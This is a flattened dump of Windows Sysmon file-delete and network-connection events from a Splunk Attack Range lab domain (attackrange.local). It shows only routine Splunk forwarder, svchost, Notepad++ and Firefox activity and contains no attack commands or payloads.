Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15E08D8208E89E34280DA7E9C9E27557,SHA256=026B2107A3DD2E53EF0F6A438C3246604BADE50B9143C15903EC9CF2FBA6F1CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:30.173{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D02A73C7CAC4EF48F4E4377EC724CC6,SHA256=757FD0AE5D589DF53646F35328CA7826B6FA76A41AEF333C03B621AC74D52B3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:30.075{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8EB68FFCE38EF111B2539B9FC685DD43,SHA256=C1286BD90CA62AF204ECB50327FFA5B238FF7C8367FA0C1CBA38070595A41DE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:31.856{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668998612314ACCFB8D4AC44965E1A2C,SHA256=C7B5637CD6D6713BDAEB1D8516DE0E8E2C44B3591926A9A2F492BF5096DA504D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:31.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08824D6E71B1119BFC70AF907CE2EF9B,SHA256=10680AB9F0A962A535DDEA9C79D57878A4F7049C9CFEA70633BED2F297EC4B02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:32.872{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92287FA2C1AD9AF8ABE291AAB815128E,SHA256=E205FED8D30255ECCEEEDAD8D195F23F18FC63B73387BED437E7384AF46082AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:32.191{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD36A7C2DBC6EB299276ABEF73DDE486,SHA256=43B4E565291338088A398C259DAF516B9C075D859005BD2E368BA27F2949F01A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:33.888{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD741B277604B7A2AE63F34DACDBB777,SHA256=FFD9E98EF23624601332AF4EBDE165AFE3EFB67DC89DA79EE95F280ACDDA8AE8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:25.594{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50988-false10.0.1.12-8000- 23542300x80000000000000001047824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:33.209{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA769FE0A4508625B1F519EEB120BF10,SHA256=C3A4DA3D5B432C4E73F911CD1BF2E27273ADC86D58EE60E5E32C144E8BEE59CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:31.286{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57229-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:34.892{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71BD85B51903E224550CA87BDB38A66,SHA256=040CF3E02A45088125274A91E2EC0B35529A09980A985F20B65B96911C43BE13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:34.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFFB076C9A1EAEC802156572FD54B278,SHA256=75AC8CCCAE330E52015E859C97B3219098B9563CC6FABF16881E4FAA60D70340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:35.892{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=959893B8663D993A83FDDA2E1328CA90,SHA256=6DC70032A630535A2E2D6FC4AE453951AEDAF720D84AB3E062200041F8FB9535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:35.258{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3E1C5397EB7875ADD8B578EDC1CC24B,SHA256=E8FF1AB2899E38623B66E8AE0FFAA2980CDAA8631C654B663483D09C662DF361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:36.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12734FA6DFAD0CD1AA81C4E54ED69F84,SHA256=23D68A9C199E595B42D7AF9794A38B2CD8BCDECF73A227D6538B0B576A7064A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:36.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91A6646281ECAD6E75E1E9D239EA7B43,SHA256=C20BBE8A792BA8D64C280E356B791A7D7A53549BA46D56F8983E277FC1D9C3DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:34.420{0C1E0330-048D-60E8-0100-00000000D001}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255ip-10-0-1-255.eu-central-1.compute.internal138netbios-dgmfalse10.0.1.15win-host-623.attackrange.local138netbios-dgm 354300x8000000000000000807104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:34.420{0C1E0330-048D-60E8-0100-00000000D001}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-623.attackrange.local138netbios-dgmfalse10.0.1.255ip-10-0-1-255.eu-central-1.compute.internal138netbios-dgm 23542300x80000000000000001047828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:36.173{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=7224762E83C8F521909828C754033DF1,SHA256=E065FED842793F9A1ECEBF3CF85C14C7094C239987EC22B443155259F3D79A95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:37.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FCA90DEBE3D09D05A9DAEA1A286DEB4,SHA256=E6DEE07D4C717A6112F4041E035D688CB6EB14E54F8B542CD9328641C662B15C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:37.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D79D52C22F73629E2B8106DF610C51E,SHA256=1AF6496D39B82766A78753FD6D138E0D69D7A49804CC7AB7679A513E9A9AC1C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:38.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B81013C4A96C2685A75FA22A3D5AA79,SHA256=60BDB194422ED5270575D386D3D1A3F20201DF8F0863AC4AA562C7915031640B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.503{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5E52209AA481FD3A7C7D3D9A85BBF628,SHA256=C259CA650C49755ABE919AFF9AA214B5F3122EBCD103A355CD2505858413E0CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADFE6137E99F4AB691BCBDCFED0C0FC,SHA256=0116823A333EDF2AAB48A940B0BCABF4062A29B2B6FE679677D6AC2D7D60194B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:37.212{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57230-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2AE580C1A54212F4F1DEBCE5F0E04595,SHA256=5C1E29C72FB2119E0B3D60F6EBA81C13025D0979323C70FF247CEA83FC110227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8148E9DDDC562582A7B27363E4BDEEEA,SHA256=9AB615C4F44FB6B4089FA1522F7F02EC85B1288AC6C2A2BA839F0AE8B45BCE8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=636462C7D302AFDF0A6E01A7AA058DBA,SHA256=B33AF5AC94FC03220D8154FC11290DA445FBDDED85EEF51D149E4F590DFFBF94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=849D36216C6583BBA2E5F8C3BEFD1459,SHA256=142E58411AB4A16BCD0515F6214A568950FB551B7AA25A8C86A1924C9DCE3BDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6E319A8D75B49FDE65488F08793FD5D5,SHA256=29BBF2A2D2BDF879672BE71ED34A1433EC930C3BE2E63A430C8C6605734F2791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=61446A74DEDA75FDB9E025A51419CDC6,SHA256=6AA904B6E6C113957DB5E1EB8C367E39F6587C3EAD8C652C91FC137D8F9C8842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=87F542A1B42B2985E28CD976B0BA040B,SHA256=ADA3E96180A343CC31125A1954BD665625A9C4D13C39771CCECEC0F8372010A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=039A0F36D4F7B7D7EBA6338C9621CF5E,SHA256=E638538C65519E2E922DCDA5DBFEC2817A2CFDD5166A82C8AF6F07DF7B9BC9E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5AF2413F3E8E39466328CC0D81A95A7F,SHA256=D9B7002B41E88D3D94061BB712A22675E9F1E451ADB771B95B40B2C8D55B846C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=49ACDB2023BFC15EF05D4EF83BFE5902,SHA256=D6E4F617273082126836D662E3A637F046C7E0FCD4D62C660DA787323C0716F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1ED45DCB030D32BDAF5D1C37B9C80669,SHA256=A885FD3A33BF50A71890F7009D82531576CF39509F7A7F99B58E0611627181E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:39.938{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246316C78EE7932F17EFA2DB8B6DA421,SHA256=45BEE2481D7C874239D5D118856E5751C0E38FE9E0C12BACEAB6EC3554928716,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:31.589{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50989-false10.0.1.12-8000- 23542300x80000000000000001047844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:39.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D0705FA9057FA15B03C10AB4DB7A39,SHA256=5FA740479B2EFD8AFC1D470536B811C4D73E778C65D27C22BC34CD136212C402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:40.954{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EDD7D908DA2D5744DAC86492BE51F2F,SHA256=0EC9CBBC9F94E371A9D64E29158854920704BF59764DE67B070B0F694BA0BC34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:40.339{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28137969FB34E13DE4529A8494E46D66,SHA256=68962ACEEFACD23E9EB87B59573B758AB38C6C75E7775985F30BC7DD1F3EAFF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:41.970{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A8A1CE9371A410355F42448A016028D,SHA256=6E568BEE4F10B6DCE32E62B900476B7892C6B7D27198F327F99BBC0481588731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:41.354{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=091F2C282B834ED2FE7CBF4D2D1476EE,SHA256=0DCFF468258CBDC8483C4E81AD77442AC28C0E71C39DC639B693E903D05DE8EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:42.985{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C65B022BBC192054D0FAD63C3525C023,SHA256=76C0CE8657A14FA312FCE4DC269DE38F4FCAB3195E4A109A2FCAC21A57276817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:42.368{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E33CA4190F358BD7189A08EDB9048D1B,SHA256=1A1F7AFA6DAA2F16267A154987668158281850779DAB04DDB50A444767EA06BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:43.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DC145555A5ECA681DA52A4DB2242CF0,SHA256=FAEDFBA5234A3EFA631FC1A381244D7DEB7F498915265C5D41CBB9F29677FC97,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:36.748{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50990-false10.0.1.12-8000- 23542300x80000000000000001047852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:44.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E8474B86A95E9B62631908ACA82FD41,SHA256=8E47E2324CEF1B046FB66F745E975B9447A3A6A23567D415B568CCB41BAA05DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:43.243{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57231-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:44.018{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D13C76E2177F0154210D2A6878DE5738,SHA256=187B30F1BFD06C22A1535E1EBB67ADB1B9D3A05B7EE09524169E4E2C4ACF5413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:44.402{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71CAD346828D8FC4430FE3D1E1023B9C,SHA256=92CED77414B02D147A8DF9AF9E06AE42171D940E6BE152AF619631097D8D4294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:44.401{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3F80ABD4E8703E0C8A7E7BBE5DFDC5F,SHA256=0A8C2A9023791A2C6343CA2DE643F69D2D668D83A5A0B9D3CFF05B6EDDF9B2C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:45.466{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 